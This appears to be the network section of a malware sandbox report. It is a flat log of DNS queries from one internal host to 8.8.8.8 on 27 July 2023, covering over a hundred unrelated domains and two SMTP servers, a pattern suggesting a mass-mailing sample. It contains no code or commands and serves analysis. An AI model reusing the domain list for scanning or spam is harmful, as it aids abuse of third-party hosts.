                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.237915039 CEST192.168.2.48.8.8.80xd0dbStandard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.381445885 CEST192.168.2.48.8.8.80xfe8dStandard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.572143078 CEST192.168.2.48.8.8.80x8a0bStandard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.574798107 CEST192.168.2.48.8.8.80xd239Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.606120110 CEST192.168.2.48.8.8.80xc846Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.633200884 CEST192.168.2.48.8.8.80x1a1aStandard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:56.668992996 CEST192.168.2.48.8.8.80x675eStandard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.003439903 CEST192.168.2.48.8.8.80x8d8fStandard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.052529097 CEST192.168.2.48.8.8.80xf9fbStandard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.056004047 CEST192.168.2.48.8.8.80x70c3Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.062474012 CEST192.168.2.48.8.8.80x4b6fStandard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.070899963 CEST192.168.2.48.8.8.80xa045Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.455923080 CEST192.168.2.48.8.8.80xfdd7Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.488434076 CEST192.168.2.48.8.8.80xa4aStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:57.488821983 CEST192.168.2.48.8.8.80x2e43Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.075200081 CEST192.168.2.48.8.8.80x6cfStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.075200081 CEST192.168.2.48.8.8.80x54aStandard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.075284958 CEST192.168.2.48.8.8.80xbb2cStandard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.075366020 CEST192.168.2.48.8.8.80xffdeStandard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.111624002 CEST192.168.2.48.8.8.80xea16Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.139447927 CEST192.168.2.48.8.8.80x5722Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.458471060 CEST192.168.2.48.8.8.80xd930Standard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.459666014 CEST192.168.2.48.8.8.80x480fStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.742712021 CEST192.168.2.48.8.8.80xc38Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.964589119 CEST192.168.2.48.8.8.80x57ddStandard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.967984915 CEST192.168.2.48.8.8.80x2ffaStandard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:58.968525887 CEST192.168.2.48.8.8.80xc47dStandard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.033206940 CEST192.168.2.48.8.8.80xded0Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.038147926 CEST192.168.2.48.8.8.80x7aedStandard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.353077888 CEST192.168.2.48.8.8.80xb50cStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.356822968 CEST192.168.2.48.8.8.80x4fb8Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.675678015 CEST192.168.2.48.8.8.80x9132Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:59.712881088 CEST192.168.2.48.8.8.80x584bStandard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.356386900 CEST192.168.2.48.8.8.80x4573Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.361887932 CEST192.168.2.48.8.8.80x81d5Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.365819931 CEST192.168.2.48.8.8.80xd904Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.411632061 CEST192.168.2.48.8.8.80x8c5dStandard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.416754007 CEST192.168.2.48.8.8.80x1f50Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.989959002 CEST192.168.2.48.8.8.80x3fcfStandard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:00.998608112 CEST192.168.2.48.8.8.80x232bStandard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.004560947 CEST192.168.2.48.8.8.80x35a2Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.005582094 CEST192.168.2.48.8.8.80x5da3Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.008027077 CEST192.168.2.48.8.8.80x5249Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.012444019 CEST192.168.2.48.8.8.80xe84aStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.018621922 CEST192.168.2.48.8.8.80x4b04Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.022630930 CEST192.168.2.48.8.8.80x933bStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.024547100 CEST192.168.2.48.8.8.80xed61Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.026168108 CEST192.168.2.48.8.8.80x7574Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.031815052 CEST192.168.2.48.8.8.80xbf34Standard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.554348946 CEST192.168.2.48.8.8.80x2224Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.557482958 CEST192.168.2.48.8.8.80x7a11Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.652558088 CEST192.168.2.48.8.8.80x1d4cStandard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.661518097 CEST192.168.2.48.8.8.80xfed2Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.663431883 CEST192.168.2.48.8.8.80x573bStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.710516930 CEST192.168.2.48.8.8.80xe1dbStandard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.715353012 CEST192.168.2.48.8.8.80x8785Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.715801001 CEST192.168.2.48.8.8.80xfdf2Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.950800896 CEST192.168.2.48.8.8.80xf6e6Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.198074102 CEST192.168.2.48.8.8.80x4776Standard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.199517965 CEST192.168.2.48.8.8.80xd12fStandard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.215082884 CEST192.168.2.48.8.8.80x2db1Standard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.298568010 CEST192.168.2.48.8.8.80x4f80Standard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.299201012 CEST192.168.2.48.8.8.80xa080Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.309093952 CEST192.168.2.48.8.8.80x155aStandard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.314378023 CEST192.168.2.48.8.8.80xa385Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.315978050 CEST192.168.2.48.8.8.80x5ec9Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.586558104 CEST192.168.2.48.8.8.80xdefStandard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.989859104 CEST192.168.2.48.8.8.80xf52cStandard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.007195950 CEST192.168.2.48.8.8.80x52bdStandard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.085628986 CEST192.168.2.48.8.8.80xbcc6Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.132580996 CEST192.168.2.48.8.8.80x4981Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.132718086 CEST192.168.2.48.8.8.80xdfcfStandard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.133549929 CEST192.168.2.48.8.8.80xb115Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.138864994 CEST192.168.2.48.8.8.80xfdeaStandard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.140235901 CEST192.168.2.48.8.8.80x95d5Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.154827118 CEST192.168.2.48.8.8.80x4cd1Standard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.738152027 CEST192.168.2.48.8.8.80xc55aStandard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.739273071 CEST192.168.2.48.8.8.80xe912Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.799940109 CEST192.168.2.48.8.8.80x7a2dStandard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.799941063 CEST192.168.2.48.8.8.80xd1f9Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.063745975 CEST192.168.2.48.8.8.80xf3b1Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.064094067 CEST192.168.2.48.8.8.80x704bStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.131036043 CEST192.168.2.48.8.8.80x8a2dStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.137512922 CEST192.168.2.48.8.8.80x2161Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.180680990 CEST192.168.2.48.8.8.80x5366Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.203253031 CEST192.168.2.48.8.8.80xc992Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.451704025 CEST192.168.2.48.8.8.80x1dfeStandard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.454260111 CEST192.168.2.48.8.8.80x680fStandard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.460192919 CEST192.168.2.48.8.8.80x643cStandard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.473294973 CEST192.168.2.48.8.8.80x457cStandard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.014578104 CEST192.168.2.48.8.8.80x6126Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.246655941 CEST192.168.2.48.8.8.80xb8b8Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.400685072 CEST192.168.2.48.8.8.80xe7b4Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.715949059 CEST192.168.2.48.8.8.80x69c4Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.724602938 CEST192.168.2.48.8.8.80x50f5Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.726399899 CEST192.168.2.48.8.8.80xb91aStandard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.728913069 CEST192.168.2.48.8.8.80xd3ebStandard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.731333017 CEST192.168.2.48.8.8.80x364dStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.734808922 CEST192.168.2.48.8.8.80xe5aaStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.736949921 CEST192.168.2.48.8.8.80xc82bStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.906749964 CEST192.168.2.48.8.8.80xc600Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.143490076 CEST192.168.2.48.8.8.80x3db8Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.154576063 CEST192.168.2.48.8.8.80x12d1Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.187072992 CEST192.168.2.48.8.8.80xc6a5Standard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.190824032 CEST192.168.2.48.8.8.80x1fbbStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.496680975 CEST192.168.2.48.8.8.80xceaeStandard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.501836061 CEST192.168.2.48.8.8.80x81c8Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.033487082 CEST192.168.2.48.8.8.80x5575Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.038393021 CEST192.168.2.48.8.8.80x440bStandard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.043911934 CEST192.168.2.48.8.8.80xd4f0Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.273375034 CEST192.168.2.48.8.8.80x1fbbStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.448928118 CEST192.168.2.48.8.8.80xc1f9Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.451174021 CEST192.168.2.48.8.8.80xc16fStandard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.457724094 CEST192.168.2.48.8.8.80xa923Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.638655901 CEST192.168.2.48.8.8.80xce76Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.747086048 CEST192.168.2.48.8.8.80x7a8Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.765713930 CEST192.168.2.48.8.8.80x71fStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.029242992 CEST192.168.2.48.8.8.80x5575Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.390367985 CEST192.168.2.48.8.8.80x1fbbStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.518429041 CEST192.168.2.48.8.8.80x1740Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.520168066 CEST192.168.2.48.8.8.80xbc60Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.529680014 CEST192.168.2.48.8.8.80xb9beStandard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.537983894 CEST192.168.2.48.8.8.80x6d60Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.763438940 CEST192.168.2.48.8.8.80x71fStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.911595106 CEST192.168.2.48.8.8.80x39deStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.931075096 CEST192.168.2.48.8.8.80xc1a9Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:09.664926052 CEST192.168.2.48.8.8.80xd598Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:09.679883957 CEST192.168.2.48.8.8.80xe1c9Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:10.014398098 CEST192.168.2.48.8.8.80xe823Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:10.895509005 CEST192.168.2.48.8.8.80x61f1Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.057137966 CEST192.168.2.48.8.8.80xa83fStandard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.067336082 CEST192.168.2.48.8.8.80xd0bbStandard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.420872927 CEST192.168.2.48.8.8.80xc1d9Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:12.813493967 CEST192.168.2.48.8.8.80xa2e7Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.021703005 CEST192.168.2.48.8.8.80x7c84Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:13.176981926 CEST192.168.2.48.8.8.80xba87Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.121896982 CEST192.168.2.48.8.8.80x1d76Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:14.914835930 CEST192.168.2.48.8.8.80x8dffStandard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.182209015 CEST192.168.2.48.8.8.80xd36aStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.366420031 CEST192.168.2.48.8.8.80x4449Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:16.684653997 CEST192.168.2.48.8.8.80x4b74Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.376538038 CEST192.168.2.48.8.8.80x4449Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:17.797081947 CEST192.168.2.48.8.8.80xfa8dStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:18.128643036 CEST192.168.2.48.8.8.80xedf5Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:19.058505058 CEST192.168.2.48.8.8.80xbc35Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:19.417010069 CEST192.168.2.48.8.8.80xfe3Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:19.419260025 CEST192.168.2.48.8.8.80x29cdStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:19.423008919 CEST192.168.2.48.8.8.80x7f2eStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:20.684286118 CEST192.168.2.48.8.8.80x6a2Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.088397980 CEST192.168.2.48.8.8.80x71fcStandard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.440582991 CEST192.168.2.48.8.8.80xfa8aStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:22.874933004 CEST192.168.2.48.8.8.80x65f3Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.062163115 CEST192.168.2.48.8.8.80x1531Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.066303015 CEST192.168.2.48.8.8.80x3b02Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.067081928 CEST192.168.2.48.8.8.80xd0fdStandard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.151165009 CEST192.168.2.48.8.8.80x8907Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.164928913 CEST192.168.2.48.8.8.80x9fbbStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.550570965 CEST192.168.2.48.8.8.80xc7c4Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:23.958869934 CEST192.168.2.48.8.8.80x2c8eStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:24.408006907 CEST192.168.2.48.8.8.80x289aStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:24.529239893 CEST192.168.2.48.8.8.80x775aStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:24.560036898 CEST192.168.2.48.8.8.80x96eaStandard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:24.582372904 CEST192.168.2.48.8.8.80x86daStandard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:24.943741083 CEST192.168.2.48.8.8.80x55a1Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:25.241117954 CEST192.168.2.48.8.8.80xb5bfStandard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:25.625610113 CEST192.168.2.48.8.8.80xd21bStandard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:25.772416115 CEST192.168.2.48.8.8.80x5206Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.035327911 CEST192.168.2.48.8.8.80x1fc1Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.098129988 CEST192.168.2.48.8.8.80xb0d5Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.129683018 CEST192.168.2.48.8.8.80x1c0dStandard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.389441013 CEST192.168.2.48.8.8.80x6e9dStandard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.571958065 CEST192.168.2.48.8.8.80x44c4Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
